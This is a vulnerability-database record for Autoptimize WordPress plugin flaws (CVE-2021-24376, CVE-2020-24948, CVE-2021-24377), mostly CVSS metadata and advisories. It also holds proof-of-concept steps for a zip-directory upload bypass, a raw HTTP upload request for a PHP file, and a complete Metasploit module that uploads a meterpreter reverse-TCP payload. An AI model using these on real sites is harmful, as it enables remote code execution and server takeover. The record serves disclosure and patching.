The Autoptimize WordPress plugin before 2.7.8 attempts to delete malicious files (such as .php) from the archive uploaded via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked, so it is possible to upload a zip containing a directory with a PHP file in it, and that file is then not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the "Import Settings" functionality to achieve Remote Code Execution.
{"id": "CVE-2021-24376", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-24376", "description": "The Autoptimize WordPress plugin before 2.7.8 attempts to delete malicious files (such as .php) form the uploaded archive via the \"Import Settings\" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the \"Import Settings\" functionality to achieve Remote Code Execution.", "published": "2021-06-21T20:15:00", "modified": "2021-09-20T17:10:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24376", "reporter": "contact@wpscan.com", "references": ["https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e"], "cvelist": ["CVE-2020-24948", "CVE-2021-24376"], "immutableFields": [], "lastseen": "2022-03-23T14:53:29", "viewCount": 25, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-24948", "CVE-2021-24377"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160850"]}, {"type": "wpexploit", "idList": ["WPEX-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "WPEX-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "WPVDB-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}]}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-24948"]}, {"type": "wpexploit", "idList": ["WPEX-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": [], "cpe23": [], "cwe": ["CWE-434"], "affectedSoftware": [{"cpeName": "autoptimize:autoptimize", "version": "2.7.8", "operator": "lt", "name": "autoptimize"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:autoptimize:autoptimize:2.7.8:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.7.8", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e", "name": "https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e", "refsource": "CONFIRM", "tags": ["Exploit", "Third Party Advisory"]}]}
{"wpexploit": [{"lastseen": "2021-06-14T11:34:12", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24376"], "description": "The plugin attempts to delete malicious files (such as .php) form the uploaded archive via the \"Import Settings\" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the \"Import Settings\" functionality to achieve Remote Code Execution. \n", "modified": "2021-06-07T05:59:32", "published": "2020-10-09T00:00:00", "id": "WPEX-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E", "href": "", "type": "wpexploit", "title": "Autoptimize < 2.7.8 - Arbitrary File Upload via \"Import Settings\"", "sourceData": "Regularly, zip which contained a PHP file was extracted, but the PHP extension was not on a white list so it was removed from the disk afterwards. It turned out that it is possible to upload a zip which contained a directory with PHP file in it and then it was not removed from the disk. \r\n\r\nUpload can be done using Import Settings functionality available in the following directory: http://localhost:8000/wp-content/uploads/ao_ccss/dir/wp-admin/options-general.php?page=ao_critcss \r\n\r\nExample content of an archive:\r\n$ zip -sf rce.zip\r\nArchive contains:\r\n dir/\r\n dir/index.php\r\n settings.json\r\nTotal 3 entries (20 bytes)\r\n\r\nExample content of dir/index.php file:\r\n<?php phpinfo() ?>\r\n\r\nsettings.json is an empty file.\r\n\r\nAs you can see, there is a \"dir\" directory inside a zip which contains index.php file. Both will not be removed from the disk after being extracted. 
After the upload, file can be accessed by visiting such address: http://localhost:8000/wp-content/uploads/ao_ccss/dir/ \r\n\r\nDue to the fact that file is named index.php, there was no need to include file name in the address.", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-15T22:09:08", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-24948"], "description": "The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.\n", "modified": "2020-09-04T05:00:08", "published": "2020-08-24T00:00:00", "id": "WPEX-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "href": "", "type": "wpexploit", "title": "Autoptimize < 2.7.7 - Authenticated Arbitrary File Upload", "sourceData": "https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://example.com/wp-admin/options-general.php?page=ao_critcss\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080\r\nContent-Length: 504\r\nConnection: close\r\nCookie: [Admin Cookies]\r\n\r\n-----------------------------161325441624547204062709166080\r\nContent-Disposition: form-data; name=\"file\"; filename=\"rce.php\"\r\nContent-Type: application/zip\r\n\r\n<?php phpinfo() ?>\r\n-----------------------------161325441624547204062709166080\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nao_ccss_import\r\n-----------------------------161325441624547204062709166080\r\nContent-Disposition: form-data; name=\"ao_ccss_import_nonce\"\r\n\r\n6df2d6b321\r\n-----------------------------161325441624547204062709166080--\r\n\r\n\r\nEven if the 
request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-06-14T11:34:12", "bulletinFamily": "software", "cvelist": ["CVE-2021-24376"], "description": "The plugin attempts to delete malicious files (such as .php) form the uploaded archive via the \"Import Settings\" feature, after its extraction. However, the extracted folders are not checked and it is possible to upload a zip which contained a directory with PHP file in it and then it is not removed from the disk. It is a bypass of CVE-2020-24948 which allows sending a PHP file via the \"Import Settings\" functionality to achieve Remote Code Execution. \n\n### PoC\n\nRegularly, zip which contained a PHP file was extracted, but the PHP extension was not on a white list so it was removed from the disk afterwards. It turned out that it is possible to upload a zip which contained a directory with PHP file in it and then it was not removed from the disk. Upload can be done using Import Settings functionality available in the following directory: http://localhost:8000/wp-content/uploads/ao_ccss/dir/wp-admin/options-general.php?page=ao_critcss Example content of an archive: $ zip -sf rce.zip Archive contains: dir/ dir/index.php settings.json Total 3 entries (20 bytes) Example content of dir/index.php file: settings.json is an empty file. As you can see, there is a \"dir\" directory inside a zip which contains index.php file. Both will not be removed from the disk after being extracted. 
After the upload, file can be accessed by visiting such address: http://localhost:8000/wp-content/uploads/ao_ccss/dir/ Due to the fact that file is named index.php, there was no need to include file name in the address.\n", "modified": "2021-06-07T05:59:32", "id": "WPVDB-ID:93EDCC23-894A-46C2-84D2-407DCB64BA1E", "href": "https://wpscan.com/vulnerability/93edcc23-894a-46c2-84d2-407dcb64ba1e", "published": "2020-10-09T00:00:00", "type": "wpvulndb", "title": "Autoptimize < 2.7.8 - Arbitrary File Upload via \"Import Settings\"", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-15T22:09:08", "bulletinFamily": "software", "cvelist": ["CVE-2020-24948"], "description": "The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.\n\n### PoC\n\nhttps://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080 Content-Length: 504 Connection: close Cookie: [Admin Cookies] \\-----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=\"file\"; filename=\"rce.php\" Content-Type: application/zip \\-----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=\"action\" ao_ccss_import \\-----------------------------161325441624547204062709166080 Content-Disposition: form-data; name=\"ao_ccss_import_nonce\" 6df2d6b321 \\-----------------------------161325441624547204062709166080-- Even if the request generates an 
error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php\n", "modified": "2020-09-04T05:00:08", "published": "2020-08-24T00:00:00", "id": "WPVDB-ID:56DC9A8C-05AE-4881-A92E-E213EAB866A0", "href": "https://wpscan.com/vulnerability/56dc9a8c-05ae-4881-a92e-e213eab866a0", "type": "wpvulndb", "title": "Autoptimize < 2.7.7 - Authenticated Arbitrary File Upload", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:34:05", "description": "Arbitrary File Upload via \"Import Settings\" vulnerability discovered by Marcin W\u0119g\u0142owski in WordPress Autoptimize plugin (versions <= 2.7.7).\n\n## Solution\n\n\r\n Update the WordPress Autoptimize plugin to the latest available version (at least 2.7.8).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-09T00:00:00", "type": "patchstack", "title": "WordPress Autoptimize plugin <= 2.7.7 - Arbitrary File Upload via \"Import Settings\" vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24376"], 
"modified": "2020-10-09T00:00:00", "id": "PATCHSTACK:027D7F5A807352C0EB139AC726619FCF", "href": "https://patchstack.com/database/vulnerability/autoptimize/wordpress-autoptimize-plugin-2-7-7-arbitrary-file-upload-via-import-settings-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-01T19:34:31", "description": "Authenticated Arbitrary File Upload vulnerability found by Nguyen Van Khanh (SunCSR) in WordPress Autoptimize plugin (versions <= 2.7.6).\n\n## Solution\n\n\r\n Update the WordPress Autoptimize plugin to the latest available version (at least <= 2.7.7).\r\n ", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-24T00:00:00", "type": "patchstack", "title": "WordPress Autoptimize plugin <= 2.7.6 - Authenticated Arbitrary File Upload vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24948"], "modified": "2020-08-24T00:00:00", "id": "PATCHSTACK:6B05DD1261702D4767C1CA08194B518D", "href": 
"https://patchstack.com/database/vulnerability/autoptimize/wordpress-autoptimize-plugin-2-7-6-authenticated-arbitrary-file-upload-vulnerability", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T15:33:48", "description": "The ao_ccss_import AJAX call in Autoptimize Wordpress Plugin 2.7.6 does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to remote command execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-03T15:15:00", "type": "cve", "title": "CVE-2020-24948", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24948"], "modified": "2021-03-04T20:45:00", "cpe": [], "id": "CVE-2020-24948", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24948", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2022-03-23T14:53:30", "description": "The Autoptimize WordPress plugin before 2.7.8 attempts to remove potential malicious files from the extracted archive uploaded via the 
'Import Settings' feature, however this is not sufficient to protect against RCE as a race condition can be achieved in between the moment the file is extracted on the disk but not yet removed. It is a bypass of CVE-2020-24948.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-21T20:15:00", "type": "cve", "title": "CVE-2021-24377", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-24948", "CVE-2021-24377"], "modified": "2021-09-20T17:10:00", "cpe": [], "id": "CVE-2021-24377", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24377", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-01-08T15:49:06", "description": "", "published": "2021-01-08T00:00:00", "type": "packetstorm", "title": "WordPress Autoptimize Shell Upload", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-24948"], "modified": "2021-01-08T00:00:00", "id": "PACKETSTORM:160850", "href": "https://packetstormsecurity.com/files/160850/WordPress-Autoptimize-Shell-Upload.html", "sourceData": "`## \n# This module requires Metasploit: 
https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info( \ninfo, \n'Name' => 'Wordpress Autoptimize Authenticated File Upload', \n'Description' => %q{ \nThe ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, \nallowing high privilege users to upload arbitrary files, such as PHP, leading to RCE. \n}, \n'Author' => \n[ \n'Khanh Nguyen - Suncsr Team', # Vulnerability discovery \n'Hoa Nguyen - Suncsr Team', # Metasploit module \n'Thien Ngo - Suncsr Team' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2020-24948'], \n['EDB', '48770'], \n['WPVDB', '10372'] \n], \n'Privileged' => false, \n'Platform' => ['php'], \n'Arch' => ARCH_PHP, \n'DefaultOptions' => { \n'PAYLOAD' => 'php/meterpreter/reverse_tcp' \n}, \n'Targets' => [['WP Autoptimize 2.7.6', {}]], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2020-08-24')) \n \nregister_options( \n[ \nOptString.new('USERNAME', [true, 'The WordPress password to authenticate with', nil]), \nOptString.new('PASSWORD', [true, 'The WordPress username to authenticate with', nil]) \n]) \nend \n \ndef check \ncheck_plugin_version_from_readme('autoptimize','2.7.7') \nend \n \ndef ao_ccss_import_nonce(cookie) \nres = send_request_cgi({ \n'uri' => normalize_uri(wordpress_url_backend,'options-general.php'), \n'cookie' => cookie, \n'vars_get' => { \n'page' => 'ao_critcss' \n} \n},5) \n \nif res.code == 200 \nprint_good(\"Found ao_ccss_import_nonce_code Value!\") \nelse \nfail_with(Failure::Unknown,'Server did not response in an expected way') \nend \n \nao_ccss_import_nonce_code = res.body.match(/'ao_ccss_import_nonce', '(\\w+)/).captures[0] \nreturn ao_ccss_import_nonce_code \nend \n \ndef exploit \nusername = 
datastore['USERNAME'] \npassword = datastore['PASSWORD'] \nprint_status(\"Trying to login as #{username}\") \ncookie = wordpress_login(datastore['USERNAME'],datastore['PASSWORD']) \nif cookie.nil? \nprint_error(\"Unable to login as #{username}\") \nend \n \nvars = ao_ccss_import_nonce(cookie) \nprint_status(\"Trying to upload payload\") \nfilename = \"#{rand_text_alpha_lower(8)}.php\" \n \ndata = Rex::MIME::Message.new \ndata.add_part('ao_ccss_import', nil, nil, 'form-data; name=\"action\"') \ndata.add_part(vars, nil, nil, 'form-data; name=\"ao_ccss_import_nonce\"') \ndata.add_part(payload.encoded, 'application/zip', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{filename}\\\"\") \npost_data = data.to_s \nprint_status(\"Uploading payload\") \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(wordpress_url_backend,'admin-ajax.php'), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => post_data, \n'cookie' => cookie \n}) \n \nif res.code == 200 \nregister_files_for_cleanup(filename) \nelse \nfail_with(Failure::Unknown,'Server did not response in an expected way') \nend \n \nprint_status(\"Calling uploaded file #{filename}\") \nsend_request_cgi({'uri' => normalize_uri(wordpress_url_wp_content, 'uploads','ao_ccss',filename)},5) \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160850/wpautoptimize276-shell.rb.txt"}]}